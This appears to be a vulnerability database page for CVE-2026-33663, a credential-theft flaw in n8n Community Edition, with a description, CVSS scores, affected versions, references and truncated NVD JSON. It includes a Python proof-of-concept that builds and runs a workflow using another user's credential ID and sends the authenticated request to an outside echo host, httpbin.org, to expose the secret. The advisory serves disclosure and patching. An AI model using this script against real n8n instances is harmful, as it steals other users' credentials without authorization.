CVE-2026-33663

Description

n8n is an open source workflow automation platform. Prior to versions 2.14.1, 2.13.3, and 1.123.27, an authenticated user with the `global:member` role could exploit chained authorization flaws in n8n's credential pipeline to steal plaintext secrets from generic HTTP credentials (`httpBasicAuth`, `httpHeaderAuth`, `httpQueryAuth`) belonging to other users on the same instance. The attack abuses a name-based credential resolution path that does not enforce ownership or project scope, combined with a bypass in the credentials permission checker that causes generic HTTP credential types to be skipped during pre-execution validation. Together, these flaws allow a member-role user to resolve another user's credential ID and execute a workflow that decrypts and uses that credential without authorization. Native integration credential types (e.g. `slackApi`, `openAiApi`, `postgres`) are not affected by this issue. This vulnerability affects Community Edition only. Enterprise Edition has additional permission gates on workflow creation and execution that independently block this attack chain. The issue has been fixed in n8n versions 1.123.27, 2.13.3, and 2.14.1. Users should upgrade to one of these versions or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: Restrict instance access to fully trusted users only, and/or audit credentials stored on the instance and rotate any generic HTTP credentials (`httpBasicAuth`, `httpHeaderAuth`, `httpQueryAuth`) that may have been exposed. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:n8n:n8n:*:*:*:*:community:node.js:*:* - VULNERABLE

cpe:2.3:a:n8n:n8n:2.14.0:*:*:*:community:node.js:*:* - VULNERABLE

n8n < 1.123.27

n8n >= 2.0.0, < 2.13.3

n8n >= 2.14.0, < 2.14.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target n8n instance
TARGET_URL = "http://localhost:5678"
# Attacker session with 'global:member' role
ATTACKER_SESSION = "attacker_session_cookie"

# The ID of the credential owned by another user (Victim)
STOLEN_CRED_ID = "TARGET_CREDENTIAL_ID"

# 1. Define a workflow payload that uses the stolen credential
workflow_payload = {
    "name": "Exploit_CVE_2026_33663",
    "nodes": [
        {
            "parameters": {
                "url": "http://httpbin.org/post", 
                "authentication": "genericCredentialType",
                "genericAuthType": "httpHeaderAuth",
                "nodeCredentialType": "httpHeaderAuth",
                # Injecting the credential ID we want to steal
                "credentialId": STOLEN_CRED_ID 
            },
            "name": "HTTP Request Node",
            "type": "n8n-nodes-base.httpRequest",
            "typeVersion": 4.1,
            "position": [250, 300]
        }
    ],
    "connections": {}
}

headers = {"Cookie": f"session={ATTACKER_SESSION}"}

# 2. Create the workflow
create_resp = requests.post(f"{TARGET_URL}/rest/workflows", json=workflow_payload, headers=headers)
workflow_id = create_resp.json().get("id")

if create_resp.status_code == 200:
    print(f"[+] Workflow created with ID: {workflow_id}")
    
    # 3. Execute the workflow
    # The vulnerability allows bypassing the ownership check for 'httpHeaderAuth'
    # during execution, effectively decrypting and using the victim's secret.
    exec_resp = requests.post(f"{TARGET_URL}/rest/workflows/{workflow_id}/execute", headers=headers)
    
    if exec_resp.status_code == 200:
        print("[+] Workflow executed successfully using stolen credential.")
        print(f"[+] Response data: {exec_resp.text}")
    else:
        print("[-] Execution failed.")
else:
    print("[-] Workflow creation failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33663
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33663
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33663/
[4] VulDB https://vuldb.com/cve/CVE-2026-33663
[5] https://github.com/n8n-io/n8n/security/advisories/GHSA-m63j-689w-3j35

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33663", "sourceIdentifier": "[email protected]", "published": "2026-03-25T18:16:32.230", "lastModified": "2026-03-31T16:39:13.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. Prior to versions 2.14.1, 2.13.3, and 1.123.27, an authenticated user with the `global:member` role could exploit chained authorization flaws in n8n's credential pipeline to steal plaintext secrets from generic HTTP credentials (`httpBasicAuth`, `httpHeaderAuth`, `httpQueryAuth`) belonging to other users on the same instance. The attack abuses a name-based credential resolution path that does not enforce ownership or project scope, combined with a bypass in the credentials permission checker that causes generic HTTP credential types to be skipped during pre-execution validation. Together, these flaws allow a member-role user to resolve another user's credential ID and execute a workflow that decrypts and uses that credential without authorization. Native integration credential types (e.g. `slackApi`, `openAiApi`, `postgres`) are not affected by this issue. This vulnerability affects Community Edition only. Enterprise Edition has additional permission gates on workflow creation and execution that independently block this attack chain. The issue has been fixed in n8n versions 1.123.27, 2.13.3, and 2.14.1. Users should upgrade to one of these versions or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: Restrict instance access to fully trusted users only, and/or audit credentials stored on the instance and rotate any generic HTTP credentials (`httpBasicAuth`, `httpHeaderAuth`, `httpQueryAuth`) that may have been exposed. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures."}, {"lang": "es", "value": "n8n es una plataforma de automatización de flujos de trabajo de código abierto. Antes de las versiones 2.14.1, 2.13.3 y 1.123.27, un usuario autenticado con el rol 'global:member' podía explotar fallos encadenados de autorización en la cadena de credenciales de n8n para robar secretos en texto plano de credenciales HTTP genéricas ('httpBasicAuth', 'httpHeaderAuth', 'httpQueryAuth') pertenecientes a otros usuarios en la misma instancia. El ataque abusa de una ruta de resolución de credenciales basada en nombres que no aplica la propiedad ni el alcance del proyecto, combinada con un bypass en el verificador de permisos de credenciales que hace que los tipos de credenciales HTTP genéricas se omitan durante la validación previa a la ejecución. Juntos, estos fallos permiten a un usuario con rol de miembro resolver el ID de credencial de otro usuario y ejecutar un flujo de trabajo que descifra y utiliza esa credencial sin autorización. Los tipos de credenciales de integración nativa (por ejemplo, 'slackApi', 'openAiApi', 'postgres') no se ven afectados por este problema. Esta vulnerabilidad afecta solo a la Community Edition. La Enterprise Edition tiene puertas de permiso adicionales en la creación y ejecución de flujos de trabajo que bloquean independientemente esta cadena de ataque. El problema se ha solucionado en las versiones de n8n 1.123.27, 2.13.3 y 2.14.1. Los usuarios deben actualizar a una de estas versiones o posteriores para remediar la vulnerabilidad. Si la actualización no es posible de inmediato, los administradores deben considerar las siguientes mitigaciones temporales: Restringir el acceso a la instancia solo a usuarios de plena confianza, y/o auditar las credenciales almacenadas en la instancia y rotar cualquier credencial HTTP genérica ('httpBasicAuth', 'httpHeaderAuth', 'httpQueryAuth') que pueda haber sido expuesta. Estas soluciones provisionales no remedian completamente el riesgo y solo deben usarse como medidas de mitigación a corto plazo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": ... (truncated)